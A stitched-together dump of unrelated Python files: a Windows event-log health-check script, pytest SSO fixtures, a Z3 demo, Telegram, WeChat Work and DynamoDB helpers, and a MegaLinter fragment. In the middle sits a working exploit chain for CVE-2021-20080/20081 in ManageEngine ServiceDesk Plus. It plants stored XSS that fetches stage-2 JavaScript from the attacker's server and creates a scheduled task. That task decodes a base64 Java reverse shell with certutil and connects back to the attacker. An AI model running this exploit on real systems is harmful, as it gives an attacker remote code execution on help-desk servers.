# NOTE: DEBUG is deliberately the effective level (it was assigned twice in
# the original; the dead INFO assignment has been dropped).
level = logging.DEBUG
# Log to the console in addition to the file when running interactively
# (over SSH, or in an xterm-like terminal); otherwise log to file only.
# BUG FIX: os.environ.get('TERM') returns None when TERM is unset, and
# 'xterm' in None raises TypeError - default to '' instead.
if os.environ.get('SSH_TTY') or 'xterm' in os.environ.get('TERM', ''):
    handlers = [
        logging.FileHandler(sys.argv[0] + '.log'),
        logging.StreamHandler(),
    ]
else:
    handlers = [logging.FileHandler(sys.argv[0] + '.log')]
logging.basicConfig(
    level=level,
    format='%(asctime)s [%(name)s][%(levelname)s] %(message)s',
    handlers=handlers,
)
def run_cmd(cmd, return_output=False):
    """Run a command line, returning (exit_code, output).

    The command goes through the shell only when it contains ';' or '|'
    (pipelines/sequences need it); otherwise it is tokenized with shlex and
    executed directly, which avoids shell-injection for simple commands.

    :param cmd: command line to execute
    :param return_output: when True the second tuple element carries the
        command's combined stdout+stderr (stripped); otherwise ''
    :return: (0, output-or-'') on success; (nonzero, error detail) on failure
    """
    logging.debug('cmd is: {0}'.format(cmd))
    try:
        if ';' in cmd or '|' in cmd:
            # shell metacharacters present - must use shell=True
            ret = check_output(cmd, universal_newlines=True, stderr=STDOUT, shell=True).strip()
        else:
            ret = check_output(shlex.split(cmd), universal_newlines=True, stderr=STDOUT).strip()
    except CalledProcessError as err:
        logging.debug(f'"{cmd}" FAILED')
        return ((err.returncode, err.stdout) if hasattr(err, 'stdout') else (err.returncode, "cmd had no output"))
    except FileNotFoundError as err:
        # command binary does not exist (fixed 'sterror' typo in the message)
        return ((2, err.strerror) if hasattr(err, 'strerror') else (1, 'no strerror provided'))
    except OSError:
        return (2, 'OSError occurred')
    logging.debug(f'cmd output is: {ret}')
    return (0, ret) if return_output else (0, '')
def record_timestamp(event_source, event_id, event_timestamp, read_or_write):
    """Persist or fetch the last-seen event timestamp in a small index file.

    :param event_source: event log name; part of the index file name
    :param event_id: event id; part of the index file name
    :param event_timestamp: value written when read_or_write == 'w' (ignored on read)
    :param read_or_write: open() mode - 'w' writes, anything else reads
    :return: first line of the file on read; None when missing or after a write
    :raises Exception: re-raises unexpected I/O errors after logging them
    """
    filename = './.eventindex_{}_{}.index'.format(event_source, event_id)
    try:
        with open(filename, read_or_write) as f:
            if read_or_write == 'w':
                f.write(str(event_timestamp))
            else:
                # only the first line is meaningful
                for one_line in f:
                    return one_line
    except FileNotFoundError:
        logging.warning('index file not found, ignoring')
        return None
    except Exception:
        # BUG FIX: original used a bare "except:" and then raised the
        # BaseException *class*, destroying the real error. Log and re-raise
        # the original exception instead.
        logging.error('Unable to write to file {}. Exiting'.format(filename))
        raise
    return None
def get_events(log_type, desired_event_id, desired_event_string=None, num_events_to_read=10):
    """Scan the Windows event log for a matching event id.

    Reads up to *num_events_to_read* of the newest events from *log_type*,
    stopping early once the timestamp recorded on the previous run is reached.

    :param log_type: event log name, e.g. 'System' or 'Application'
    :param desired_event_id: integer event id to look for (callers pass int)
    :param desired_event_string: accepted but currently unused -
        NOTE(review): confirm whether message matching was intended
    :param num_events_to_read: scan window size
    :return: (1, '') when a matching event is found, else (0, '')
    """
    logging.debug('hello from get_events func. Args are: {}, {}, {}, {}'.format(log_type, desired_event_id, desired_event_string, num_events_to_read))
    # imported lazily so this script still loads on non-Windows hosts
    import win32evtlog
    import winerror
    import win32evtlogutil
    log_handle = win32evtlog.OpenEventLog('localhost', log_type)
    total = win32evtlog.GetNumberOfEventLogRecords(log_handle)
    logging.debug('total # of events: {}'.format(total))
    flags = win32evtlog.EVENTLOG_BACKWARDS_READ | win32evtlog.EVENTLOG_SEQUENTIAL_READ
    i = 1
    # timestamp saved by the previous run (None on first run / missing index)
    last_timestamp_string = record_timestamp(log_type, desired_event_id, '', 'r')
    last_timestamp = datetime.strptime(last_timestamp_string, '%Y-%m-%d %H:%M:%S') if last_timestamp_string else None
    while True:
        all_events = win32evtlog.ReadEventLog(log_handle, flags, 0)
        if not all_events:
            win32evtlog.CloseEventLog(log_handle)
            return (0, '')
        logging.debug('Next batch, size: {}'.format(len(all_events)))
        for one_event in all_events:
            # FIX: the original assigned event_id twice (str then int);
            # only the int form is needed for the comparison below.
            event_id = winerror.HRESULT_CODE(one_event.EventID)
            event_source = one_event.SourceName
            event_msg = win32evtlogutil.SafeFormatMessage(one_event, log_type)
            event_timestamp = one_event.TimeGenerated
            logging.debug('|{}| Event:\nID: {}, Timestamp: {}, Source: {}\nMessage: {}'.format(i, event_id, event_timestamp.Format(), event_source, event_msg))
            if i == 1:
                # remember the 1st event so that we dont have to scan all events next time
                record_timestamp(log_type, desired_event_id, event_timestamp, 'w')
            if last_timestamp and event_timestamp <= last_timestamp:
                logging.debug('already processed this event, will exit at this time.')
                win32evtlog.CloseEventLog(log_handle)
                return (0, '')
            if event_id == desired_event_id:
                logging.warning('Event matched, will return 1')
                logging.info('Event:\nID: {}, Timestamp: {}, Source: {}\nMessage: {}'.format(event_id, event_timestamp.Format(), event_source, event_msg))
                win32evtlog.CloseEventLog(log_handle)
                return (1, '')
            i = i + 1
            if i > int(num_events_to_read):
                win32evtlog.CloseEventLog(log_handle)
                return (0, '')
def main():
    """Read config, run the health check (cmd or event-log mode), remediate on failure.

    res[0] semantics: 0 = healthy, 1 = check failed (remediate), anything
    else = the check itself is broken.
    """
    args = parseargs()
    logging.info('Script start')
    with open(args.configfile) as f:
        config_json = json.load(f)
    remediation_command_syntax = config_json['remediation_command_syntax']
    # NOTE(review): loaded but never used below - confirm whether the
    # remediation result was meant to be validated.
    remediation_command_result = config_json['remediation_command_result']
    debug_cmd_list_before = config_json.get('debug_cmd_list_before', [])
    debug_cmd_list_after = config_json.get('debug_cmd_list_after', [])
    if 'events' in args.mode:
        # Windows event-log mode: res[0] is 1 when the configured event was seen
        eventlog_type = config_json['eventlog_type']
        eventlog_search_string = config_json['eventlog_search_string']
        eventlog_id = config_json['eventlog_id']
        eventlog_num_of_events_to_check = config_json['eventlog_num_of_events_to_check']
        res = get_events(eventlog_type, int(eventlog_id), eventlog_search_string, eventlog_num_of_events_to_check)
    else:
        # command mode: res[0] is the check command's exit status
        check_command_syntax = config_json['check_command_syntax']
        #check_command_result = config_json['check_command_result']
        #pdb.set_trace()
        res = run_cmd(check_command_syntax, return_output=True)
    if not res[0]:
        logging.info('check command success')
    elif res[0] == 1:
        # failure detected: capture debug output, remediate, capture again
        logging.warning(f'check failed. Details: {res[1]}')
        logging.info('running debug cmds BEFORE remediation')
        for debug_cmd in debug_cmd_list_before:
            debug_cmd_res = run_cmd(debug_cmd, return_output=True)
            logging.info(f'{debug_cmd}: {debug_cmd_res[1]}')
        logging.warning('Running remediation command.')
        res_remediation_cmd = run_cmd(remediation_command_syntax, return_output=True)
        if not res_remediation_cmd[0]:
            logging.info('remediation command success judging by return code')
        else:
            logging.error(f'error running remediation command: {res_remediation_cmd[1]}')
        logging.info('running debug cmds AFTER remediation')
        for debug_cmd in debug_cmd_list_after:
            debug_cmd_res = run_cmd(debug_cmd, return_output=True)
            logging.info(f'{debug_cmd}: {debug_cmd_res[1]}')
    else:
        # any exit status other than 0/1 means the check command is misconfigured
        logging.error(f'Non-1 error while running cmd, check syntax. Script will exit. Error: {res[1]}')
    logging.info('Script finish')
if __name__ == "__main__":
    main()
|
import os, pytest
from dotenv import load_dotenv
import requests
import json
import base64
@pytest.fixture(scope="session")
def test_env():
    """Load .env and expose blobstore credentials as base64-encoded env vars.

    Session fixture: copies endpoint/accessKey/secretKey from the 'blobstore'
    JSON env var (when it carries credentials) into blob_* env vars, then
    base64-encodes the key material in place.
    """
    load_dotenv()
    blobstore = json.loads(os.getenv('blobstore'))
    if 'credentials' in blobstore:
        # FIX: reuse the already-parsed JSON instead of re-reading and
        # re-parsing the same environment variable a second time
        credentials = blobstore['credentials']
        mapping = {
            "blob_endpoint": 'endpoint',
            "blob_accessKey": "accessKey",
            "blob_secretKey": "secretKey"}
        for k, v in mapping.items():
            os.environ[k] = credentials[v]
    os.environ['blob_accessKey'] = str(base64.b64encode(bytes(os.environ['blob_accessKey'], 'utf-8')), 'utf-8')
    os.environ['blob_secretKey'] = str(base64.b64encode(bytes(os.environ['blob_secretKey'], 'utf-8')), 'utf-8')
@pytest.fixture(scope="session")
def test_param_token():
    """Authenticate against SSO once per session and yield connection params."""
    load_dotenv()
    url = os.getenv('sso_endpoint') + '/v4.0/auth'
    payload = {
        "username": os.getenv("sso_username"),
        "password": os.getenv("sso_password")
    }
    resp = requests.post(url, json=payload, verify=False)
    # fail fast when authentication did not succeed
    if resp.status_code != requests.codes.ok:
        raise ConnectionError('SSO endpoint failed. status_code: {}, sso_endpoint: {}, username: {}'.format(
            resp.status_code,
            url,
            os.getenv("sso_username")))
    token = 'Bearer ' + resp.cookies['EIToken']
    yield {
        "afs_url": os.getenv("afs_url"),
        "instance_id": os.getenv("instance_id"),
        "token": token,
    }
|
import requests, sys
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import quote
import random
# Author: Chris Lyne (@lynerc)
# Exploits CVE-2021-20080 and CVE-2021-20081 in chain
# --- argument handling -------------------------------------------------
if len(sys.argv) < 4:
    print("Usage: script.py <http(s)://target:port> <attacker ip> <attacker port>")
    sys.exit(0)
target = sys.argv[1]      # base URL of the ServiceDesk Plus instance
shell_ip = sys.argv[2]    # attacker host serving stage 2 / receiving the shell
shell_port = sys.argv[3]  # attacker port for the reverse shell
stage2_url = "http://" + shell_ip + "/stage2" # XSS will call back here to download more JS
# targeting ManageEngine Servicedesk Plus on Windows
# This XSS is staged due to length restrictions. It loads more JS from the attacker's machine
# spaces not allowed
xss = """');}{function/**/loaded(){eval(this.responseText);}var/**/req=new/**/XMLHttpRequest();req.addEventListener("load",loaded);req.open("GET","${stage2}");req.send(null);//"""
xss = xss.replace("${stage2}", stage2_url)
# This XML contains info for a new workstation asset
xml = """<?xml version="1.0" encoding="UTF-8" ?><DocRoot>
<ComputerName><command>hostname</command><output><![CDATA[
]]></output></ComputerName>
<OS_Category><command>uname -s</command><output><![CDATA[
Darwin
]]></output></OS_Category>
<Hardware_Info>
<OS_Category><command>sw_vers</command><output><![CDATA[
ProductName: macOS
ProductVersion: 11.1
BuildVersion: 20C69
]]></output></OS_Category>
<Computer_Information><command>hostname -s</command><output><![CDATA[
${workstation}
]]></output></Computer_Information>
<CPU_Information><command>system_profiler SPHardwareDataType</command><output><![CDATA[
Hardware:
Hardware Overview:
Model Name: MacBook Pro
Model Identifier: MacBookPro14,3
Processor Name: Quad-Core Intel Core i7
Processor Speed: 2.9 GHz
Number of Processors: 1
Total Number of Cores: 4
L2 Cache (per Core): 256 KB
L3 Cache: 8 MB
Hyper-Threading Technology: Enabled
Memory: 16 GB
System Firmware Version: 429.61.7.0.0
SMC Version (system): 2.46f4
Serial Number (system): A03XJ3PMHTK9
]]></output></CPU_Information>
<NIC_Info><command>/sbin/ifconfig</command><output><![CDATA[
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=400<CHANNEL_IO>
ether 7c:83:91:d4:a7:c4
inet6 fe80::102b:587a:9312:a8dc%en0 prefixlen 64 secured scopeid 0x5
inet ${xss} netmask 0xffffff00 broadcast 192.168.0.255
nd6 options=201<PERFORMNUD,DAD>
media: autoselect
status: active
]]></output></NIC_Info>
<PhysicaldrivesInfo><command>/usr/sbin/system_profiler SPParallelATADataType</command><output><![CDATA[
]]></output></PhysicaldrivesInfo>
<HarddrivesInfo><command>/usr/sbin/system_profiler SPSerialATADataType</command><output><![CDATA[
]]></output></HarddrivesInfo>
</Hardware_Info>
<Software_Info>
<Installed_Softwares><command>system_profiler SPApplicationsDataType</command><output><![CDATA[
]]></output></Installed_Softwares>
</Software_Info>
</DocRoot>"""
# fill in xml placeholders
workstation = 'tenable_zero_day'
xml = xml.replace('${workstation}', workstation)
xml = xml.replace('${xss}', xss)
headers = {'Content-Type': 'application/xml'}
print("Sending malicious XML document...")
res = requests.post(target + '/discoveryServlet/WsDiscoveryServlet?computerName=tenable_zero_day_was_here', data=xml, headers=headers)
print(res.text)
print("\nThe administrator must view your asset now. Either wait patiently or send them this link to entice them to view the asset:\n'" + target + "/SearchN.do?searchText=tenable_zero_day&subModSelText=&selectName=assets'");
# ok now wait for a call back from the xss
# this will happen when the admin visits the asset page
data = """var/**/client=new/**/XMLHttpRequest();client.open("GET","/",true);client.send();var/**/now;var/**/start_time;var/**/start_milli;client.onreadystatechange=function(){if(this.readyState==this.HEADERS_RECEIVED){var/**/date=client.getResponseHeader("Date");now=new/**/Date(date);start_time=now;start_milli=start_time.setMinutes(now.getMinutes()+1);t="";c=document.cookie.split(";");for(i=0;i<c.length;i++){var/**/e=c[i].trim();if(e.startsWith("sdpcsrfcookie")){t=e.split("=")[1];}}var/**/xhr=new/**/XMLHttpRequest();xhr.open("POST","/api/v3/custom_schedules",true);xhr.withCredentials=true;xhr.setRequestHeader("X-ZCSRF-TOKEN",t);xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");xhr.send("INPUT_DATA=%7B%22custom_schedules%22%3A%7B%22is_enabled%22%3Atrue%2C%22description%22%3A%22test123%22%2C%22executor_type%22%3A%22script%22%2C%22is_periodic%22%3Atrue%2C%22interval_type%22%3A%22hours%22%2C%22interval_value%22%3A%221%22%2C%22executor%22%3A%22${payload}%22%2C%22name%22%3A%22${name}%22%2C%22start_time%22%3A%7B%22value%22%3A%22"+start_milli+"%22%7D%7D%7D&sdpcsrfparam="+t);}}"""
# random schedule name so we can create new ones
data = data.replace("${name}", 'test'+str(random.random()*10000)[:4])
# this payload will pop you a reverse shell
payload = 'cmd /c '
payload += '\\"cd c:\\\\ && '
# write a base64-encoded Java-based reverse shell to c:\\b64file
# shell courtesy of https://gist.github.com/caseydunham/53eb8503efad39b83633961f12441af0
payload += 'echo,yv66vgAAADQAeQoAAgADBwAEDAAFAAYBABBqYXZhL2xhbmcvT2JqZWN0AQAGPGluaXQ+AQADKClWCgAIAAkHAAoMAAsABgEAD1JldmVyc2VUY3BTaGVsbAEACnByaW50VXNhZ2UKAA0ADgcADwwAEAARAQAQamF2YS9sYW5nL1N5c3RlbQEABGV4aXQBAAQoSSlWCgATABQHABUMABYAFwEAEWphdmEvbGFuZy9JbnRlZ2VyAQAIcGFyc2VJbnQBABUoTGphdmEvbGFuZy9TdHJpbmc7KUkIABkBAAdjbWQuZXhlBwAbAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyBwAdAQAQamF2YS9sYW5nL1N0cmluZwoAGgAfDAAFACABABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWCgAaACIMACMAJAEAE3JlZGlyZWN0RXJyb3JTdHJlYW0BAB0oWilMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwoAGgAmDAAnACgBAAVzdGFydAEAFSgpTGphdmEvbGFuZy9Qcm9jZXNzOwcAKgEAD2phdmEvbmV0L1NvY2tldAoAKQAsDAAFAC0BABYoTGphdmEvbGFuZy9TdHJpbmc7SSlWCgAvADAHADEMADIAMwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwoALwA1DAA2ADMBAA5nZXRFcnJvclN0cmVhbQoAKQAwCgAvADkMADoAOwEAD2dldE91dHB1dFN0cmVhbQEAGCgpTGphdmEvaW8vT3V0cHV0U3RyZWFtOwoAKQA5CgApAD4MAD8AQAEACGlzQ2xvc2VkAQADKClaCgBCAEMHAEQMAEUARgEAE2phdmEvaW8vSW5wdXRTdHJlYW0BAAlhdmFpbGFibGUBAAMoKUkKAEIASAwASQBGAQAEcmVhZAoASwBMBwBNDABOABEBABRqYXZhL2lvL091dHB1dFN0cmVhbQEABXdyaXRlCgBLAFAMAFEABgEABWZsdXNoBQAAAAAAAAAyCgBVAFYHAFcMAFgAWQEAEGphdmEvbGFuZy9UaHJlYWQBAAVzbGVlcAEABChKKVYKAC8AWwwAXABGAQAJZXhpdFZhbHVlBwBeAQATamF2YS9sYW5nL0V4Y2VwdGlvbgoALwBgDABhAAYBAAdkZXN0cm95CgApAGMMAGQABgEABWNsb3NlCQANAGYMAGcAaAEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwgAagEAJ1VzYWdlOiBSZXZlcnNlVGNwU2hlbGwuamF2YSA8aXA+IDxwb3J0PgoAbABtBwBuDABvAHABABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAARtYWluAQANU3RhY2tNYXBUYWJsZQcAdgEAE1tMamF2YS9sYW5nL1N0cmluZzsBAApTb3VyY2VGaWxlAQAUUmV2ZXJzZVRjcFNoZWxsLmphdmEAIQAIAAIAAAAAAAMAAQAFAAYAAQBxAAAAHQABAAEAAAAFKrcAAbEAAAABAHIAAAAGAAEAAAANAAkAcwAgAAEAcQAAAacABgAMAAAA1iq+BaIACrgABwO4AAwqAzJMKgQyuAASPRIYTrsAGlkEvQAcWQMtU7cAHgS2ACG2ACU6BLsAKVkrHLcAKzoFGQS2AC46BhkEtgA0OgcZBbYANzoIGQS2ADg6CRkFtgA8OgoZBbYAPZoAYBkGtgBBngAQGQoZBrYAR7YASqf/7hkHtgBBngAQGQoZB7YAR7YASqf/7hkItgBBngAQGQkZCLYAR7YASqf/7hkKtgBPGQm2AE8UAFK4AFQZBLYAWlenAAg6C6f/nhkEtgB
fGQW2AGKnAAU6BLEAAgC4AL4AwQBdABsA0ADTAF0AAgByAAAAYgAYAAAAEAAGABIACQATAA0AFQARABYAGAAXABsAGQAzABoAPgAbAFMAHABhAB0AaQAeAH4AHwCTACAAqAAhAK0AIgCyACMAuAAlAL4AJgDBACcAxgApAMsAKgDQACsA1QAsAHQAAABHAAoN/wBTAAsHAHUHABwBBwAcBwAvBwApBwBCBwBCBwBCBwBLBwBLAAAHFBQUWAcAXQT/AAwABAcAdQcAHAEHABwAAQcAXQEACQALAAYAAQBxAAAAJQACAAAAAAAJsgBlEmm2AGuxAAAAAQByAAAACgACAAAALgAIAC8AAQB3AAAAAgB4> b64file && '
# base64 decode the file into a Java class file
payload += 'certutil -f -decode b64file ReverseTcpShell.class && '
# and run it using the jvm packaged with the product
payload += 'C:\\\\PROGRA~1\\\\ManageEngine\\\\ServiceDesk\\\\jre\\\\bin\\\\java.exe ReverseTcpShell ${shell_ip} ${shell_port}\\"'
payload = payload.replace("${shell_ip}", shell_ip).replace("${shell_port}", shell_port)
# url encode payload
payload = quote(payload, safe='')
data = data.replace("${payload}", payload)
PORT_NUMBER = 80  # stage-2 delivery port; stage2_url above implies port 80
class MyHTTPD(BaseHTTPRequestHandler):
    """One-shot HTTP handler that serves the stage-2 JavaScript payload."""
    def do_GET(self):
        # permissive CORS so the XSS running on the victim origin can fetch us
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Access-Control-Allow-Origin", "*")
        self.end_headers()
        print("\nReceived a callback from the XSS. Sending stage 2 to create malicious custom scheduled action.")
        print("You should probably start your netcat listener now... ")
        self.wfile.write(data.encode('UTF-8'))
httpd = HTTPServer(('0.0.0.0', PORT_NUMBER), MyHTTPD)
print('Starting HTTP listener...')
httpd.handle_request() # just one is fine
|
# Z3 bit-vector demo (BitVec/BitVecVal/simplify presumably come from an
# earlier `from z3 import *` - TODO confirm).
# FIX: converted Python-2-only `print expr` statements to print() calls;
# the single-argument print(...) form behaves identically on Python 2 and 3.
x = BitVec('x', 16)
y = BitVec('y', 16)
print(x + 2)
# Internal representation
print((x + 2).sexpr())
# -1 is equal to 65535 for 16-bit integers
print(simplify(x + y - 1))
# Creating bit-vector constants
a = BitVecVal(-1, 16)
b = BitVecVal(65535, 16)
print(simplify(a == b))
a = BitVecVal(-1, 32)
b = BitVecVal(65535, 32)
# -1 is not equal to 65535 for 32-bit integers
print(simplify(a == b))
|
# noinspection PyPackageRequirements
from telegram import InlineKeyboardMarkup, InlineKeyboardButton
class InlineKeyboard:
    """Factory helpers producing InlineKeyboardMarkup layouts for the bot."""

    @staticmethod
    def release_info(release_id, webarchive_url):
        """Keyboard with a Wayback Machine link plus a magnet-expand button."""
        row = [
            InlineKeyboardButton('Wayback Machine', url=webarchive_url),
            InlineKeyboardButton('magnet con trackers', callback_data='expandmagnet:{}'.format(release_id)),
        ]
        return InlineKeyboardMarkup([row])

    @staticmethod
    def collapse_magnet_button(release_id):
        """Single-button keyboard that collapses an expanded magnet."""
        row = [InlineKeyboardButton('comprimi', callback_data='collapse:{}'.format(release_id))]
        return InlineKeyboardMarkup([row])

    @staticmethod
    def release_deeplink(release_deeplink):
        """Single-button keyboard linking to the torrent deeplink."""
        row = [InlineKeyboardButton('vai al torrent', url=release_deeplink)]
        return InlineKeyboardMarkup([row])
|
# coding:utf-8
"""
企业微信素材管理模块
"""
__author__ = 'BLUE'
__time__ = 'Tue May 21 2019 10:43:40 GMT+0800'
# ------------------------------------------------------------------------
from WechatBiz.core.WechatBase import WechatBase
from WechatBiz.lib.Utils import is_allowed_extension
def hand_check_file(media_file):
    """Validate the upload's extension and wrap it for the media API.

    :param media_file: File object with .filename and .body
    :raises ValueError: when the extension is not in the allow-list
    :return: list containing one (filename, body) tuple
    """
    extension = media_file.filename.rsplit('.', 1)[-1].lower()
    if not is_allowed_extension(extension):
        raise ValueError(u'上传文件类型不允许.')
    return [(media_file.filename, media_file.body)]
class WxBizMedia(WechatBase):
    """Enterprise WeChat (WeChat Work) media/asset management API wrapper.

    Wraps the qyapi.weixin.qq.com media endpoints; each method returns the
    Future produced by the underlying async request helper.
    """
    def __init__(self):
        # endpoint shared by all temporary-media uploads
        self.__tempUrl = 'https://qyapi.weixin.qq.com/cgi-bin/media/upload'
        token, expires_at = self.initToken()
        super(WxBizMedia, self).__init__(
            access_token=token, access_token_expires_at=expires_at)
    # upload a temporary image
    def UploadTempImage(self, media_file):
        """
        Upload a temporary image.
        :param media_file: the file to upload, a File object
            see https://work.weixin.qq.com/api/doc#90000/90135/90253
        :return: Future carrying the JSON response payload
        """
        files = hand_check_file(media_file)
        return self.request.uploadMedia(url=self.__tempUrl, data=dict(type='image', files=files))
    # upload a temporary voice clip
    def UploadTempVoice(self, media_file):
        """
        Upload a temporary voice clip.
        :param media_file: the file to upload, a File object
            see https://work.weixin.qq.com/api/doc#90000/90135/90253
        :return: Future carrying the JSON response payload
        """
        files = hand_check_file(media_file)
        return self.request.uploadMedia(url=self.__tempUrl, data=dict(type='voice', files=files))
    # upload a temporary video
    def UploadTempVideo(self, media_file):
        """
        Upload a temporary video.
        :param media_file: the file to upload, a File object
            see https://work.weixin.qq.com/api/doc#90000/90135/90253
        :return: Future carrying the JSON response payload
        """
        files = hand_check_file(media_file)
        return self.request.uploadMedia(url=self.__tempUrl, data=dict(type='video', files=files))
    # upload a temporary file of any allowed type
    def UploadTempFile(self, media_file):
        """
        Upload a temporary file.
        :param media_file: the file to upload, a File object
            see https://work.weixin.qq.com/api/doc#90000/90135/90253
        :return: Future carrying the JSON response payload
        """
        files = hand_check_file(media_file)
        return self.request.uploadMedia(url=self.__tempUrl, data=dict(type='file', files=files))
    # upload a permanent image
    def UploadEverImage(self, media_file):
        """
        Upload a permanent image.
        :param media_file: the file to upload, a File object
            see https://work.weixin.qq.com/api/doc#90000/90135/90256
        :return: Future carrying the JSON response payload
        """
        files = hand_check_file(media_file)
        return self.request.uploadMedia(
            url='https://qyapi.weixin.qq.com/cgi-bin/media/uploadimg',
            data=dict(files=files)
        )
    # fetch a temporary media item (returns the whole response object)
    def GetTempMedia(self, media_id):
        """
        Fetch temporary media (the whole response object; parse it yourself).
        To return it to a front-end, take the body res.body and set the
        response type accordingly (e.g. "Content-Type", "image/jpg").
        :param media_id: media file id
            see https://work.weixin.qq.com/api/doc#90000/90135/90254
        :return: Future carrying the JSON response payload
        """
        return self.request.getRes(
            'https://qyapi.weixin.qq.com/cgi-bin/media/get', data=dict(
                media_id=media_id
            ))
    # fetch high-definition voice media (returns the whole response object)
    def GetSuperMedia(self, media_id):
        """
        Fetch high-definition voice media (whole response object; parse it yourself).
        :param media_id: id of a voice file uploaded via the JSSDK uploadVoice API
            see https://work.weixin.qq.com/api/doc#90000/90135/90255
        :return: Future carrying the JSON response payload
        """
        return self.request.getRes(
            'https://qyapi.weixin.qq.com/cgi-bin/media/get/jssdk', data=dict(
                media_id=media_id
            ))
|
import logging
from tornado.options import options
from tornado.httpclient import HTTPError
from tornado_botocore import Botocore
logger = logging.getLogger(__name__)
class DDBBase(object):
    """Base class for DynamoDB-backed tables accessed via tornado_botocore.

    Subclasses override the table/schema class attributes below; this base
    provides operation factories, idempotent table creation and attribute
    typing. NOTE(review): Python 2 code (print statements, iteritems).
    """
    TABLE_NAME = ''
    # The data type for the attribute. You can specify S for string data,
    # N for numeric data, or B for binary data.
    ATTRIBUTE_DEFINITIONS = []
    # http://docs.aws.amazon.com/amazondynamodb/latest/developerguide/DataModel.html#DataModelPrimaryKey
    KEY_SCHEMA = []
    # http://docs.aws.amazon.com/amazondynamodb/latest/developerguide/SecondaryIndexes.html
    LOCAL_SECONDARY_INDEXES = []
    GLOBAL_SECONDARY_INDEXES = []
    # http://docs.aws.amazon.com/amazondynamodb/latest/developerguide/ProvisionedThroughputIntro.html
    PROVISIONED_THROUGHPUT = {}
    # maps attribute name -> DynamoDB type code (used by with_types below)
    ATTRIBUTES = {}
    def __init__(self):
        pass
    def dynamodb(self, operation):
        """Build a Botocore helper bound to *operation*, reusing one session."""
        session = getattr(self, '_session', None)
        ddb = Botocore(
            service='dynamodb', operation=operation,
            session=session,
            region_name=options.amazon_region,
            endpoint_url=options.amazon_ddb_host,
        )
        '''if options.amazon_access_key and options.amazon_secret_key:
            ddb.session.set_credentials(
                options.amazon_access_key,
                options.amazon_secret_key, token=None)'''
        # cache the session so subsequent operations share it
        self._session = ddb.session
        return ddb
    @property
    def table_kwargs(self):
        """Keyword arguments for CreateTable, including optional indexes."""
        kwargs = {
            'table_name': self.TABLE_NAME,
            'attribute_definitions': self.ATTRIBUTE_DEFINITIONS,
            'key_schema': self.KEY_SCHEMA,
            'provisioned_throughput': self.PROVISIONED_THROUGHPUT,
        }
        if getattr(self, 'LOCAL_SECONDARY_INDEXES', None):
            kwargs['local_secondary_indexes'] = self.LOCAL_SECONDARY_INDEXES
        if getattr(self, 'GLOBAL_SECONDARY_INDEXES', None):
            kwargs['global_secondary_indexes'] = self.GLOBAL_SECONDARY_INDEXES
        return kwargs
    def create_table_if_not_exists(self):
        """DescribeTable; when it errors (table assumed missing), CreateTable.

        NOTE(review): the second DescribeTable retry inside the except block
        looks redundant - confirm intent before touching.
        """
        ddb_describe_table = self.dynamodb(operation='DescribeTable')
        try:
            res = ddb_describe_table.call(table_name=self.TABLE_NAME)
        except HTTPError as a:
            ddb_describe_table = self.dynamodb(operation='DescribeTable')
            try:
                res = ddb_describe_table.call(table_name=self.TABLE_NAME)
            except HTTPError as b:
                print b.response.body
            # table does not exist
            logger.info('Creating {table_name} table ...'.format(table_name=self.TABLE_NAME))
            ddb_create_table = self.dynamodb(operation='CreateTable')
            try:
                res = ddb_create_table.call(**self.table_kwargs)
            except HTTPError as e:
                msg = '{table_name} table creation failed: {error}.'.format(
                    table_name=self.TABLE_NAME,
                    error=e.response.body)
                logger.error(msg)
                raise Exception(msg)
    def with_types(self, attributes_dict):
        """Wrap plain attribute values in DynamoDB {type-code: value} envelopes.

        'L' values become lists of {S: str(item)}; 'M' values become dicts of
        {S: value}; everything else is wrapped as-is under its type code.
        """
        result = {}
        print attributes_dict
        for key, val in attributes_dict.iteritems():
            '''print 'VARIABLE TYPE FOR TEST!!!!'
            print type(val)
            print val
            if isinstance(val, list):
                print 'THIS IS A LIST YO'
                l2 = []
                for a in val:
                    l2.append(unicode(a))
                print 'LIST'
                result[key] ={self.ATTRIBUTES[key]: l2}
            elif val is dict:
                result2 = {}
                for key2, val2 in val.iteritems():
                    result2[key2] = unicode(val2)
                result[key] = result2
            else:
                result[key] = {self.ATTRIBUTES[key]: unicode(val)}
            print result'''
            if self.ATTRIBUTES[key] == 'L':
                l2 = []
                for a in val:
                    l2.append(dict(S= str(a)))
                val = l2
            elif self.ATTRIBUTES[key] == 'M':
                d2 = {}
                for dkey, dval in val.iteritems():
                    d2[dkey] = dict(S=dval)
                val = d2
            result[key] = {self.ATTRIBUTES[key]: val}
        return result
|
#!/usr/bin/env python3
import glob
import importlib
import logging
import os
import re
import git
import yaml
from megalinter.Linter import Linter
# Root of the repository to lint: the Docker mount point when present,
# otherwise the parent of this package (dev / test checkout).
REPO_HOME_DEFAULT = (
    "/tmp/lint"
    if os.path.isdir("/tmp/lint")
    else os.path.dirname(os.path.abspath(__file__)) + os.path.sep + ".."
)
# Matches ANSI/VT100 escape sequences (e.g. terminal color codes)
ANSI_ESCAPE_REGEX = re.compile(r"(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]")
def list_excluded_directories():
    """Return the directory names that linting must never descend into."""
    return [
        "__pycache__",
        ".git",
        ".pytest_cache",
        ".rbenv",
        ".venv",
        ".terragrunt-cache",
        "node_modules",
        "report",
    ]
# Returns directory where all .yml language descriptors are defined
def get_descriptor_dir():
    """Locate the folder holding the per-language .yml descriptor files."""
    # Compiled version (copied from DockerFile)
    if os.path.isdir("/megalinter-descriptors"):
        return "/megalinter-descriptors"
    # Dev / Test version
    descriptor_dir = os.path.realpath(
        os.path.dirname(os.path.abspath(__file__)) + "/descriptors"
    )
    assert os.path.isdir(
        descriptor_dir
    ), f"Descriptor dir {descriptor_dir} not found !"
